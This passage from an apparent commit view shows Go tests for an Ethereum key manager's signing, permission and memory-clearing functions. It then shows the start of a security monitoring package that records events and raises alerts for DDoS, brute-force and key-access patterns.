tx := types.NewTx(&types.DynamicFeeTx{
ChainID: chainID,
Nonce: nonce,
To: &toAddr,
Value: value,
Gas: gasLimit,
GasFeeCap: gasPrice,
GasTipCap: big.NewInt(1000000000), // 1 Gwei tip
Data: nil,
})
// Create signing request
request := &SigningRequest{
Transaction: tx,
ChainID: chainID,
From: signerAddr,
Purpose: "Test transaction",
UrgencyLevel: 3,
}
// Sign the transaction
result, err := km.SignTransaction(request)
require.NoError(t, err)
assert.NotNil(t, result)
assert.NotNil(t, result.SignedTx)
assert.NotNil(t, result.Signature)
assert.NotEmpty(t, result.AuditID)
assert.WithinDuration(t, time.Now(), result.SignedAt, time.Second)
assert.Equal(t, signerAddr, result.KeyUsed)
// Verify the signature is valid
signedTx := result.SignedTx
// Use appropriate signer based on transaction type
var signer types.Signer
switch signedTx.Type() {
case types.LegacyTxType:
signer = types.NewEIP155Signer(chainID)
case types.DynamicFeeTxType:
signer = types.NewLondonSigner(chainID)
default:
t.Fatalf("Unsupported transaction type: %d", signedTx.Type())
}
from, err := types.Sender(signer, signedTx)
require.NoError(t, err)
assert.Equal(t, signerAddr, from)
// Test signing with non-existent key
nonExistentAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
request.From = nonExistentAddr
_, err = km.SignTransaction(request)
assert.Error(t, err)
assert.Contains(t, err.Error(), "key not found")
// Test signing with key that can't sign
km2, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
noSignPermissions := KeyPermissions{
CanSign: false,
CanTransfer: true,
MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH (safe int64 value)
}
noSignAddr, err := km2.GenerateKey("no_sign", noSignPermissions)
require.NoError(t, err)
request.From = noSignAddr
_, err = km2.SignTransaction(request)
assert.Error(t, err)
assert.Contains(t, err.Error(), "not permitted to sign")
}
// TestSignTransactionTransferLimits tests transfer limits during signing
func TestSignTransactionTransferLimits(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_limits",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Generate a key with limited transfer permissions
maxTransfer := big.NewInt(1000000000000000000) // 1 ETH
permissions := KeyPermissions{
CanSign: true,
CanTransfer: true,
MaxTransferWei: maxTransfer,
}
signerAddr, err := km.GenerateKey("limited_signer", permissions)
require.NoError(t, err)
// Create a transaction that exceeds the limit
chainID := big.NewInt(1)
excessiveTx := types.NewTransaction(0, common.Address{}, big.NewInt(2000000000000000000), 21000, big.NewInt(20000000000), nil) // 2 ETH
request := &SigningRequest{
Transaction: excessiveTx,
ChainID: chainID,
From: signerAddr,
Purpose: "Excessive transfer",
UrgencyLevel: 3,
}
_, err = km.SignTransaction(request)
assert.Error(t, err)
assert.Contains(t, err.Error(), "transfer amount exceeds limit")
}
// TestDeriveEncryptionKey tests the key derivation function
func TestDeriveEncryptionKey(t *testing.T) {
// Test with valid master key
masterKey := "test_encryption_key_very_long_and_secure_for_testing"
key, err := deriveEncryptionKey(masterKey)
require.NoError(t, err)
assert.NotNil(t, key)
assert.Len(t, key, 32) // Should be 32 bytes for AES-256
// Test with different master key (should produce different result)
differentKey := "different_test_encryption_key_very_long_and_secure_for_testing"
key2, err := deriveEncryptionKey(differentKey)
require.NoError(t, err)
assert.NotEqual(t, key, key2)
// Test with empty master key
_, err = deriveEncryptionKey("")
assert.Error(t, err)
}
// TestValidateConfig tests the configuration validation function
func TestValidateConfig(t *testing.T) {
// Test with valid config
validConfig := &KeyManagerConfig{
KeystorePath: "/tmp/test",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
err := validateConfig(validConfig)
assert.NoError(t, err)
// Test with empty encryption key
emptyKeyConfig := &KeyManagerConfig{
KeystorePath: "/tmp/test",
EncryptionKey: "",
}
err = validateConfig(emptyKeyConfig)
assert.Error(t, err)
assert.Contains(t, err.Error(), "encryption key cannot be empty")
// Test with short encryption key
shortKeyConfig := &KeyManagerConfig{
KeystorePath: "/tmp/test",
EncryptionKey: "short",
}
err = validateConfig(shortKeyConfig)
assert.Error(t, err)
assert.Contains(t, err.Error(), "encryption key must be at least 32 characters")
// Test with empty keystore path
emptyPathConfig := &KeyManagerConfig{
KeystorePath: "",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
err = validateConfig(emptyPathConfig)
assert.Error(t, err)
assert.Contains(t, err.Error(), "keystore path cannot be empty")
}
// TestClearPrivateKey tests the private key clearing function
func TestClearPrivateKey(t *testing.T) {
// Generate a test private key
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
// Store original D value for comparison
originalD := new(big.Int).Set(privateKey.D)
// Clear the private key
clearPrivateKey(privateKey)
// Verify the D value has been cleared (nil or zero)
if privateKey.D != nil {
assert.Zero(t, privateKey.D.Sign())
} else {
assert.Nil(t, privateKey.D)
}
assert.NotEqual(t, originalD, privateKey.D)
// Test with nil private key (should not panic)
clearPrivateKey(nil)
}
// TestGenerateAuditID tests the audit ID generation function
func TestGenerateAuditID(t *testing.T) {
id1 := generateAuditID()
id2 := generateAuditID()
// Both should be non-empty and different
assert.NotEmpty(t, id1)
assert.NotEmpty(t, id2)
assert.NotEqual(t, id1, id2)
// Should be a valid hex string
hash1 := common.HexToHash(id1)
assert.NotEqual(t, hash1, common.Hash{})
hash2 := common.HexToHash(id2)
assert.NotEqual(t, hash2, common.Hash{})
}
// TestCalculateRiskScore tests the risk score calculation function
func TestCalculateRiskScore(t *testing.T) {
// Test failed operations (high risk)
score := calculateRiskScore("TRANSACTION_SIGNED", false)
assert.Equal(t, 8, score)
// Test successful transaction signing (low-medium risk)
score = calculateRiskScore("TRANSACTION_SIGNED", true)
assert.Equal(t, 3, score)
// Test key generation (medium risk)
score = calculateRiskScore("KEY_GENERATED", true)
assert.Equal(t, 5, score)
// Test key import (medium risk)
score = calculateRiskScore("KEY_IMPORTED", true)
assert.Equal(t, 5, score)
// Test key rotation (medium risk)
score = calculateRiskScore("KEY_ROTATED", true)
assert.Equal(t, 4, score)
// Test default (low risk)
score = calculateRiskScore("UNKNOWN_OPERATION", true)
assert.Equal(t, 2, score)
}
// TestKeyPermissions tests the KeyPermissions struct
func TestKeyPermissions(t *testing.T) {
// Test creating permissions with max transfer limit
maxTransfer := big.NewInt(1000000000000000000) // 1 ETH
permissions := KeyPermissions{
CanSign: true,
CanTransfer: true,
MaxTransferWei: maxTransfer,
AllowedContracts: []string{
"0x1234567890123456789012345678901234567890",
"0x0987654321098765432109876543210987654321",
},
RequireConfirm: true,
}
assert.True(t, permissions.CanSign)
assert.True(t, permissions.CanTransfer)
assert.Equal(t, maxTransfer, permissions.MaxTransferWei)
assert.Len(t, permissions.AllowedContracts, 2)
assert.True(t, permissions.RequireConfirm)
}
// BenchmarkKeyGeneration benchmarks key generation performance
func BenchmarkKeyGeneration(b *testing.B) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/benchmark_keystore",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(b, err)
permissions := KeyPermissions{CanSign: true}
b.ResetTimer()
for i := 0; i < b.N; i++ {
_, err := km.GenerateKey("benchmark", permissions)
if err != nil {
b.Fatal(err)
}
}
}
// BenchmarkTransactionSigning benchmarks transaction signing performance
func BenchmarkTransactionSigning(b *testing.B) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/benchmark_signing",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(b, err)
permissions := KeyPermissions{CanSign: true, CanTransfer: true}
signerAddr, err := km.GenerateKey("benchmark_signer", permissions)
require.NoError(b, err)
chainID := big.NewInt(1)
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000000000000000000), 21000, big.NewInt(20000000000), nil)
request := &SigningRequest{
Transaction: tx,
ChainID: chainID,
From: signerAddr,
Purpose: "Benchmark transaction",
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
_, err := km.SignTransaction(request)
if err != nil {
b.Fatal(err)
}
}
}
// ENHANCED: Unit tests for memory clearing verification
func TestMemoryClearing(t *testing.T) {
t.Run("TestSecureClearBigInt", func(t *testing.T) {
// Create a big.Int with sensitive data
sensitiveValue := big.NewInt(0)
sensitiveValue.SetString("123456789012345678901234567890123456789012345678901234567890", 10)
// Capture the original bits for verification
originalBits := make([]big.Word, len(sensitiveValue.Bits()))
copy(originalBits, sensitiveValue.Bits())
// Ensure we have actual data to clear
require.True(t, len(originalBits) > 0, "Test requires non-zero big.Int")
// Clear the sensitive value
secureClearBigInt(sensitiveValue)
// Verify all bits are zeroed
clearedBits := sensitiveValue.Bits()
for i, bit := range clearedBits {
assert.Equal(t, big.Word(0), bit, "Bit %d should be zero after clearing", i)
}
// Verify the value is actually zero
assert.True(t, sensitiveValue.Cmp(big.NewInt(0)) == 0, "BigInt should be zero after clearing")
})
t.Run("TestSecureClearBytes", func(t *testing.T) {
// Create sensitive byte data
sensitiveData := []byte("This is very sensitive private key data that should be cleared")
originalData := make([]byte, len(sensitiveData))
copy(originalData, sensitiveData)
// Verify we have data to clear
require.True(t, len(sensitiveData) > 0, "Test requires non-empty byte slice")
// Clear the sensitive data
secureClearBytes(sensitiveData)
// Verify all bytes are zeroed
for i, b := range sensitiveData {
assert.Equal(t, byte(0), b, "Byte %d should be zero after clearing", i)
}
// Verify the data was actually changed
assert.NotEqual(t, originalData, sensitiveData, "Data should be different after clearing")
})
t.Run("TestClearPrivateKey", func(t *testing.T) {
// Generate a test private key
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
// Store original values for verification
originalD := new(big.Int).Set(privateKey.D)
originalX := new(big.Int).Set(privateKey.PublicKey.X)
originalY := new(big.Int).Set(privateKey.PublicKey.Y)
// Verify we have actual key material
require.True(t, originalD.Cmp(big.NewInt(0)) != 0, "Private key D should not be zero")
require.True(t, originalX.Cmp(big.NewInt(0)) != 0, "Public key X should not be zero")
require.True(t, originalY.Cmp(big.NewInt(0)) != 0, "Public key Y should not be zero")
// Clear the private key
clearPrivateKey(privateKey)
// Verify all components are nil or zero
assert.Nil(t, privateKey.D, "Private key D should be nil after clearing")
assert.Nil(t, privateKey.PublicKey.X, "Public key X should be nil after clearing")
assert.Nil(t, privateKey.PublicKey.Y, "Public key Y should be nil after clearing")
assert.Nil(t, privateKey.PublicKey.Curve, "Curve should be nil after clearing")
})
}
// ENHANCED: Test memory usage monitoring
func TestKeyMemoryMetrics(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_metrics",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
BackupEnabled: false,
MaxFailedAttempts: 3,
LockoutDuration: 5 * time.Minute,
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Get initial metrics
initialMetrics := km.GetMemoryMetrics()
assert.NotNil(t, initialMetrics)
assert.Equal(t, 0, initialMetrics.ActiveKeys)
assert.Greater(t, initialMetrics.MemoryUsageBytes, int64(0))
// Generate some keys
permissions := KeyPermissions{
CanSign: true,
CanTransfer: true,
MaxTransferWei: big.NewInt(1000000000000000000),
}
addr1, err := km.GenerateKey("test", permissions)
require.NoError(t, err)
// Check metrics after adding a key
metricsAfterKey := km.GetMemoryMetrics()
assert.Equal(t, 1, metricsAfterKey.ActiveKeys)
// Test memory protection wrapper
err = withMemoryProtection(func() error {
_, err := km.GenerateKey("test2", permissions)
return err
})
require.NoError(t, err)
// Check final metrics
finalMetrics := km.GetMemoryMetrics()
assert.Equal(t, 2, finalMetrics.ActiveKeys)
// Note: No cleanup method available, keys remain for test duration
_ = addr1 // Silence unused variable warning
}
// ENHANCED: Benchmark memory clearing performance
func BenchmarkMemoryClearing(b *testing.B) {
b.Run("BenchmarkSecureClearBigInt", func(b *testing.B) {
// Create test big.Int values
values := make([]*big.Int, b.N)
for i := 0; i < b.N; i++ {
values[i] = big.NewInt(0)
values[i].SetString("123456789012345678901234567890123456789012345678901234567890", 10)
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
secureClearBigInt(values[i])
}
})
b.Run("BenchmarkSecureClearBytes", func(b *testing.B) {
// Create test byte slices
testData := make([][]byte, b.N)
for i := 0; i < b.N; i++ {
testData[i] = make([]byte, 64) // 64 bytes like a private key
for j := range testData[i] {
testData[i][j] = byte(j % 256)
}
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
secureClearBytes(testData[i])
}
})
b.Run("BenchmarkClearPrivateKey", func(b *testing.B) {
// Generate test private keys
keys := make([]*ecdsa.PrivateKey, b.N)
for i := 0; i < b.N; i++ {
key, err := crypto.GenerateKey()
if err != nil {
b.Fatal(err)
}
keys[i] = key
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
clearPrivateKey(keys[i])
}
})
}

View File

@@ -0,0 +1,714 @@
package security
import (
"encoding/json"
"fmt"
"sync"
"time"
)
// SecurityMonitor provides comprehensive security monitoring and alerting
type SecurityMonitor struct {
// Alert channels
alertChan chan SecurityAlert
stopChan chan struct{}
// Event tracking
events []SecurityEvent
eventsMutex sync.RWMutex
maxEvents int
// Metrics
metrics *SecurityMetrics
metricsMutex sync.RWMutex
// Configuration
config *MonitorConfig
// Alert handlers
alertHandlers []AlertHandler
}
// SecurityAlert represents a security alert
type SecurityAlert struct {
ID string `json:"id"`
Timestamp time.Time `json:"timestamp"`
Level AlertLevel `json:"level"`
Type AlertType `json:"type"`
Title string `json:"title"`
Description string `json:"description"`
Source string `json:"source"`
Data map[string]interface{} `json:"data"`
Actions []string `json:"recommended_actions"`
Resolved bool `json:"resolved"`
ResolvedAt *time.Time `json:"resolved_at,omitempty"`
ResolvedBy string `json:"resolved_by,omitempty"`
}
// SecurityEvent represents a security-related event
type SecurityEvent struct {
ID string `json:"id"`
Timestamp time.Time `json:"timestamp"`
Type EventType `json:"type"`
Source string `json:"source"`
Description string `json:"description"`
Data map[string]interface{} `json:"data"`
Severity EventSeverity `json:"severity"`
IPAddress string `json:"ip_address,omitempty"`
UserAgent string `json:"user_agent,omitempty"`
}
// SecurityMetrics tracks security-related metrics
type SecurityMetrics struct {
// Request metrics
TotalRequests int64 `json:"total_requests"`
BlockedRequests int64 `json:"blocked_requests"`
SuspiciousRequests int64 `json:"suspicious_requests"`
// Attack metrics
DDoSAttempts int64 `json:"ddos_attempts"`
BruteForceAttempts int64 `json:"brute_force_attempts"`
SQLInjectionAttempts int64 `json:"sql_injection_attempts"`
// Rate limiting metrics
RateLimitViolations int64 `json:"rate_limit_violations"`
IPBlocks int64 `json:"ip_blocks"`
// Key management metrics
KeyAccessAttempts int64 `json:"key_access_attempts"`
FailedKeyAccess int64 `json:"failed_key_access"`
KeyRotations int64 `json:"key_rotations"`
// Transaction metrics
TransactionsAnalyzed int64 `json:"transactions_analyzed"`
SuspiciousTransactions int64 `json:"suspicious_transactions"`
BlockedTransactions int64 `json:"blocked_transactions"`
// Time series data
HourlyMetrics map[string]int64 `json:"hourly_metrics"`
DailyMetrics map[string]int64 `json:"daily_metrics"`
// Last update
LastUpdated time.Time `json:"last_updated"`
}
// AlertLevel represents the severity level of an alert
type AlertLevel string
const (
AlertLevelInfo AlertLevel = "INFO"
AlertLevelWarning AlertLevel = "WARNING"
AlertLevelError AlertLevel = "ERROR"
AlertLevelCritical AlertLevel = "CRITICAL"
)
// AlertType represents the type of security alert
type AlertType string
const (
AlertTypeDDoS AlertType = "DDOS"
AlertTypeBruteForce AlertType = "BRUTE_FORCE"
AlertTypeRateLimit AlertType = "RATE_LIMIT"
AlertTypeUnauthorized AlertType = "UNAUTHORIZED_ACCESS"
AlertTypeSuspicious AlertType = "SUSPICIOUS_ACTIVITY"
AlertTypeKeyCompromise AlertType = "KEY_COMPROMISE"
AlertTypeTransaction AlertType = "SUSPICIOUS_TRANSACTION"
AlertTypeConfiguration AlertType = "CONFIGURATION_ISSUE"
AlertTypePerformance AlertType = "PERFORMANCE_ISSUE"
)
// EventType represents the type of security event
type EventType string
const (
EventTypeLogin EventType = "LOGIN"
EventTypeLogout EventType = "LOGOUT"
EventTypeKeyAccess EventType = "KEY_ACCESS"
EventTypeTransaction EventType = "TRANSACTION"
EventTypeConfiguration EventType = "CONFIGURATION_CHANGE"
EventTypeError EventType = "ERROR"
EventTypeAlert EventType = "ALERT"
)
// EventSeverity represents the severity of a security event
type EventSeverity string
const (
SeverityLow EventSeverity = "LOW"
SeverityMedium EventSeverity = "MEDIUM"
SeverityHigh EventSeverity = "HIGH"
SeverityCritical EventSeverity = "CRITICAL"
)
// MonitorConfig provides configuration for security monitoring
type MonitorConfig struct {
// Alert settings
EnableAlerts bool `json:"enable_alerts"`
AlertBuffer int `json:"alert_buffer"`
AlertRetention time.Duration `json:"alert_retention"`
// Event settings
MaxEvents int `json:"max_events"`
EventRetention time.Duration `json:"event_retention"`
// Monitoring intervals
MetricsInterval time.Duration `json:"metrics_interval"`
CleanupInterval time.Duration `json:"cleanup_interval"`
// Thresholds
DDoSThreshold int `json:"ddos_threshold"`
ErrorRateThreshold float64 `json:"error_rate_threshold"`
// Notification settings
EmailNotifications bool `json:"email_notifications"`
SlackNotifications bool `json:"slack_notifications"`
WebhookURL string `json:"webhook_url"`
}
// AlertHandler defines the interface for handling security alerts
type AlertHandler interface {
HandleAlert(alert SecurityAlert) error
GetName() string
}
// NewSecurityMonitor creates a new security monitor
func NewSecurityMonitor(config *MonitorConfig) *SecurityMonitor {
cfg := defaultMonitorConfig()
if config != nil {
cfg.EnableAlerts = config.EnableAlerts
if config.AlertBuffer > 0 {
cfg.AlertBuffer = config.AlertBuffer
}
if config.AlertRetention > 0 {
cfg.AlertRetention = config.AlertRetention
}
if config.MaxEvents > 0 {
cfg.MaxEvents = config.MaxEvents
}
if config.EventRetention > 0 {
cfg.EventRetention = config.EventRetention
}
if config.MetricsInterval > 0 {
cfg.MetricsInterval = config.MetricsInterval
}
if config.CleanupInterval > 0 {
cfg.CleanupInterval = config.CleanupInterval
}
if config.DDoSThreshold > 0 {
cfg.DDoSThreshold = config.DDoSThreshold
}
if config.ErrorRateThreshold > 0 {
cfg.ErrorRateThreshold = config.ErrorRateThreshold
}
cfg.EmailNotifications = config.EmailNotifications
cfg.SlackNotifications = config.SlackNotifications
cfg.WebhookURL = config.WebhookURL
}
sm := &SecurityMonitor{
alertChan: make(chan SecurityAlert, cfg.AlertBuffer),
stopChan: make(chan struct{}),
events: make([]SecurityEvent, 0),
maxEvents: cfg.MaxEvents,
config: cfg,
alertHandlers: make([]AlertHandler, 0),
metrics: &SecurityMetrics{
HourlyMetrics: make(map[string]int64),
DailyMetrics: make(map[string]int64),
LastUpdated: time.Now(),
},
}
// Start monitoring routines
go sm.alertProcessor()
go sm.metricsCollector()
go sm.cleanupRoutine()
return sm
}
func defaultMonitorConfig() *MonitorConfig {
return &MonitorConfig{
EnableAlerts: true,
AlertBuffer: 1000,
AlertRetention: 24 * time.Hour,
MaxEvents: 10000,
EventRetention: 7 * 24 * time.Hour,
MetricsInterval: time.Minute,
CleanupInterval: time.Hour,
DDoSThreshold: 1000,
ErrorRateThreshold: 0.05,
}
}
// RecordEvent records a security event
func (sm *SecurityMonitor) RecordEvent(eventType EventType, source, description string, severity EventSeverity, data map[string]interface{}) {
event := SecurityEvent{
ID: fmt.Sprintf("evt_%d", time.Now().UnixNano()),
Timestamp: time.Now(),
Type: eventType,
Source: source,
Description: description,
Data: data,
Severity: severity,
}
// Extract IP and User Agent from data if available
if ip, exists := data["ip_address"]; exists {
if ipStr, ok := ip.(string); ok {
event.IPAddress = ipStr
}
}
if ua, exists := data["user_agent"]; exists {
if uaStr, ok := ua.(string); ok {
event.UserAgent = uaStr
}
}
sm.eventsMutex.Lock()
// Add event to list
sm.events = append(sm.events, event)
// Trim events if too many
if len(sm.events) > sm.maxEvents {
sm.events = sm.events[len(sm.events)-sm.maxEvents:]
}
sm.eventsMutex.Unlock()
// Update metrics
sm.updateMetricsForEvent(event)
// Check if event should trigger an alert
sm.checkForAlerts(event)
}
// TriggerAlert manually triggers a security alert
func (sm *SecurityMonitor) TriggerAlert(level AlertLevel, alertType AlertType, title, description, source string, data map[string]interface{}, actions []string) {
alert := SecurityAlert{
ID: fmt.Sprintf("alert_%d", time.Now().UnixNano()),
Timestamp: time.Now(),
Level: level,
Type: alertType,
Title: title,
Description: description,
Source: source,
Data: data,
Actions: actions,
Resolved: false,
}
select {
case sm.alertChan <- alert:
// Alert sent successfully
default:
// Alert channel is full, log this issue
sm.RecordEvent(EventTypeError, "SecurityMonitor", "Alert channel full", SeverityHigh, map[string]interface{}{
"alert_type": alertType,
"alert_level": level,
})
}
}
// checkForAlerts checks if an event should trigger alerts
func (sm *SecurityMonitor) checkForAlerts(event SecurityEvent) {
switch event.Type {
case EventTypeKeyAccess:
if event.Severity == SeverityCritical {
sm.TriggerAlert(
AlertLevelCritical,
AlertTypeKeyCompromise,
"Critical Key Access Event",
"A critical key access event was detected",
event.Source,
event.Data,
[]string{"Investigate immediately", "Rotate keys if compromised", "Review access logs"},
)
}
case EventTypeTransaction:
if event.Severity == SeverityHigh || event.Severity == SeverityCritical {
sm.TriggerAlert(
AlertLevelError,
AlertTypeTransaction,
"Suspicious Transaction Detected",
"A suspicious transaction was detected and blocked",
event.Source,
event.Data,
[]string{"Review transaction details", "Check for pattern", "Update security rules"},
)
}
case EventTypeError:
if event.Severity == SeverityCritical {
sm.TriggerAlert(
AlertLevelCritical,
AlertTypeConfiguration,
"Critical System Error",
"A critical system error occurred",
event.Source,
event.Data,
[]string{"Check system logs", "Verify configuration", "Restart services if needed"},
)
}
}
// Check for patterns that might indicate attacks
sm.checkAttackPatterns(event)
}
// checkAttackPatterns checks for attack patterns in events
func (sm *SecurityMonitor) checkAttackPatterns(event SecurityEvent) {
sm.eventsMutex.RLock()
defer sm.eventsMutex.RUnlock()
// Look for patterns in recent events
recentEvents := make([]SecurityEvent, 0)
cutoff := time.Now().Add(-5 * time.Minute)
for _, e := range sm.events {
if e.Timestamp.After(cutoff) {
recentEvents = append(recentEvents, e)
}
}
// Check for DDoS patterns
if len(recentEvents) > sm.config.DDoSThreshold {
ipCounts := make(map[string]int)
for _, e := range recentEvents {
if e.IPAddress != "" {
ipCounts[e.IPAddress]++
}
}
for ip, count := range ipCounts {
if count > sm.config.DDoSThreshold/10 {
sm.TriggerAlert(
AlertLevelError,
AlertTypeDDoS,
"DDoS Attack Detected",
fmt.Sprintf("High request volume from IP %s", ip),
"SecurityMonitor",
map[string]interface{}{
"ip_address": ip,
"request_count": count,
"time_window": "5 minutes",
},
[]string{"Block IP address", "Investigate traffic pattern", "Scale infrastructure if needed"},
)
}
}
}
// Check for brute force patterns
failedLogins := 0
for _, e := range recentEvents {
if e.Type == EventTypeLogin && e.Severity == SeverityHigh {
failedLogins++
}
}
if failedLogins > 10 {
sm.TriggerAlert(
AlertLevelWarning,
AlertTypeBruteForce,
"Brute Force Attack Detected",
"Multiple failed login attempts detected",
"SecurityMonitor",
map[string]interface{}{
"failed_attempts": failedLogins,
"time_window": "5 minutes",
},
[]string{"Review access logs", "Consider IP blocking", "Strengthen authentication"},
)
}
}
// updateMetricsForEvent updates metrics based on an event
func (sm *SecurityMonitor) updateMetricsForEvent(event SecurityEvent) {
sm.metricsMutex.Lock()
defer sm.metricsMutex.Unlock()
sm.metrics.TotalRequests++
switch event.Type {
case EventTypeKeyAccess:
sm.metrics.KeyAccessAttempts++
if event.Severity == SeverityHigh || event.Severity == SeverityCritical {
sm.metrics.FailedKeyAccess++
}
case EventTypeTransaction:
sm.metrics.TransactionsAnalyzed++
if event.Severity == SeverityHigh || event.Severity == SeverityCritical {
sm.metrics.SuspiciousTransactions++
}
}
// Update time-based metrics
hour := event.Timestamp.Format("2006-01-02-15")
day := event.Timestamp.Format("2006-01-02")
sm.metrics.HourlyMetrics[hour]++
sm.metrics.DailyMetrics[day]++
sm.metrics.LastUpdated = time.Now()
}
// alertProcessor processes alerts from the alert channel
func (sm *SecurityMonitor) alertProcessor() {
for {
select {
case alert := <-sm.alertChan:
// Handle the alert with all registered handlers
for _, handler := range sm.alertHandlers {
go func(h AlertHandler, a SecurityAlert) {
if err := h.HandleAlert(a); err != nil {
sm.RecordEvent(
EventTypeError,
"AlertHandler",
fmt.Sprintf("Failed to handle alert: %v", err),
SeverityMedium,
map[string]interface{}{
"handler": h.GetName(),
"alert_id": a.ID,
"error": err.Error(),
},
)
}
}(handler, alert)
}
case <-sm.stopChan:
return
}
}
}
// metricsCollector periodically collects and updates metrics
func (sm *SecurityMonitor) metricsCollector() {
ticker := time.NewTicker(sm.config.MetricsInterval)
defer ticker.Stop()
for {
select {
case <-ticker.C:
sm.collectMetrics()
case <-sm.stopChan:
return
}
}
}
// collectMetrics collects current system metrics
func (sm *SecurityMonitor) collectMetrics() {
sm.metricsMutex.Lock()
defer sm.metricsMutex.Unlock()
// This would collect metrics from various sources
// For now, we'll just update the timestamp
sm.metrics.LastUpdated = time.Now()
}
// cleanupRoutine periodically cleans up old events and alerts
func (sm *SecurityMonitor) cleanupRoutine() {
ticker := time.NewTicker(sm.config.CleanupInterval)
defer ticker.Stop()
for {
select {
case <-ticker.C:
sm.cleanup()
case <-sm.stopChan:
return
}
}
}
// cleanup removes old events and metrics
func (sm *SecurityMonitor) cleanup() {
sm.eventsMutex.Lock()
defer sm.eventsMutex.Unlock()
// Remove old events
cutoff := time.Now().Add(-sm.config.EventRetention)
newEvents := make([]SecurityEvent, 0)
for _, event := range sm.events {
if event.Timestamp.After(cutoff) {
newEvents = append(newEvents, event)
}
}
sm.events = newEvents
// Clean up old metrics
sm.metricsMutex.Lock()
defer sm.metricsMutex.Unlock()
// Remove old hourly metrics (keep last 48 hours)
hourCutoff := time.Now().Add(-48 * time.Hour)
for hour := range sm.metrics.HourlyMetrics {
if t, err := time.Parse("2006-01-02-15", hour); err == nil && t.Before(hourCutoff) {
delete(sm.metrics.HourlyMetrics, hour)
}
}
// Remove old daily metrics (keep last 30 days)
dayCutoff := time.Now().Add(-30 * 24 * time.Hour)
for day := range sm.metrics.DailyMetrics {
if t, err := time.Parse("2006-01-02", day); err == nil && t.Before(dayCutoff) {
delete(sm.metrics.DailyMetrics, day)
}
}
}
// AddAlertHandler adds an alert handler
func (sm *SecurityMonitor) AddAlertHandler(handler AlertHandler) {
sm.alertHandlers = append(sm.alertHandlers, handler)
}
// GetEvents returns recent security events
func (sm *SecurityMonitor) GetEvents(limit int) []SecurityEvent {
sm.eventsMutex.RLock()
defer sm.eventsMutex.RUnlock()
if limit <= 0 || limit > len(sm.events) {
limit = len(sm.events)
}
events := make([]SecurityEvent, limit)
copy(events, sm.events[len(sm.events)-limit:])
return events
}
// GetMetrics returns current security metrics
func (sm *SecurityMonitor) GetMetrics() *SecurityMetrics {
sm.metricsMutex.RLock()
defer sm.metricsMutex.RUnlock()
// Return a copy to avoid race conditions
metrics := *sm.metrics
metrics.HourlyMetrics = make(map[string]int64)
metrics.DailyMetrics = make(map[string]int64)
for k, v := range sm.metrics.HourlyMetrics {
metrics.HourlyMetrics[k] = v
}
for k, v := range sm.metrics.DailyMetrics {
metrics.DailyMetrics[k] = v
}
return &metrics
}
// GetDashboardData returns data for security dashboard
func (sm *SecurityMonitor) GetDashboardData() map[string]interface{} {
metrics := sm.GetMetrics()
recentEvents := sm.GetEvents(100)
// Calculate recent activity
recentActivity := make(map[string]int)
cutoff := time.Now().Add(-time.Hour)
for _, event := range recentEvents {
if event.Timestamp.After(cutoff) {
recentActivity[string(event.Type)]++
}
}
return map[string]interface{}{
"metrics": metrics,
"recent_events": recentEvents,
"recent_activity": recentActivity,
"system_status": sm.getSystemStatus(),
"alert_summary": sm.getAlertSummary(),
}
}
// getSystemStatus returns current system security status
func (sm *SecurityMonitor) getSystemStatus() map[string]interface{} {
metrics := sm.GetMetrics()
status := "HEALTHY"
if metrics.BlockedRequests > 0 || metrics.SuspiciousRequests > 0 {
status = "MONITORING"
}
if metrics.DDoSAttempts > 0 || metrics.BruteForceAttempts > 0 {
status = "UNDER_ATTACK"
}
return map[string]interface{}{
"status": status,
"uptime": time.Since(metrics.LastUpdated).String(),
"total_requests": metrics.TotalRequests,
"blocked_requests": metrics.BlockedRequests,
"success_rate": float64(metrics.TotalRequests-metrics.BlockedRequests) / float64(metrics.TotalRequests),
}
}
// getAlertSummary returns summary of recent alerts
func (sm *SecurityMonitor) getAlertSummary() map[string]interface{} {
// This would typically fetch from an alert store
// For now, return basic summary
return map[string]interface{}{
"total_alerts": 0,
"critical_alerts": 0,
"unresolved_alerts": 0,
"last_alert": nil,
}
}
// Stop stops the security monitor
func (sm *SecurityMonitor) Stop() {
close(sm.stopChan)
}
// ExportEvents exports events to JSON
func (sm *SecurityMonitor) ExportEvents() ([]byte, error) {
sm.eventsMutex.RLock()
defer sm.eventsMutex.RUnlock()
return json.MarshalIndent(sm.events, "", " ")
}
// ExportMetrics exports metrics to JSON
func (sm *SecurityMonitor) ExportMetrics() ([]byte, error) {
metrics := sm.GetMetrics()
return json.MarshalIndent(metrics, "", " ")
}
// GetRecentAlerts returns the most recent security alerts
func (sm *SecurityMonitor) GetRecentAlerts(limit int) []*SecurityAlert {
sm.eventsMutex.RLock()
defer sm.eventsMutex.RUnlock()
alerts := make([]*SecurityAlert, 0)
count := 0
// Get recent events and convert to alerts
for i := len(sm.events) - 1; i >= 0 && count < limit; i-- {
event := sm.events[i]
// Convert SecurityEvent to SecurityAlert format expected by dashboard
alert := &SecurityAlert{
ID: fmt.Sprintf("alert_%d", i),
Type: AlertType(event.Type),
Level: AlertLevel(event.Severity),
Title: "Security Alert",
